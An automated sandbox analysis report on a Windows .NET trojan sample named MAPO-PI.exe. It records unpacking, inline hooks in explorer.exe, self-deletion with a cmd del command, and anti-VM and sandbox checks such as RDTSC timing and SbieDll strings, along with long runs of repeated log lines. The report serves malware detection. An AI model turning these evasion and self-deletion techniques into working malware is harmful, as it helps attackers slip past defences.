          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1Jump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/5@3/3
          Source: C:\Users\user\Desktop\MAPO-PI.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: MAPO-PI.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: MAPO-PI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: MAPO-PI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: MAPO-PI.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_004170AC push eax; retf 3_2_004170AF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00417A47 push edx; ret 3_2_00417A48
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0040ED75 push 00000051h; retf 3_2_0040ED79
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018ED0D1 push ecx; ret 3_2_018ED0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CBD0D1 push ecx; ret 16_2_04CBD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03047A47 push edx; ret 16_2_03047A48
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_030470AC push eax; retf 16_2_030470AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF5C push eax; ret 16_2_0304CF62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEA5 push eax; ret 16_2_0304CEF8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEF2 push eax; ret 16_2_0304CEF8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEFB push eax; ret 16_2_0304CF62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0303ED75 push 00000051h; retf 16_2_0303ED79

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.25fd0c0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MAPO-PI.exe PID: 3868, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000003039B4E second address: 0000000003039B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 1752Thread sleep time: -43348s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 2952Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1552Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4856Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6932Thread sleep time: -65000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5905Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2572Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread delayed: delay time: 43348Jump to behavior
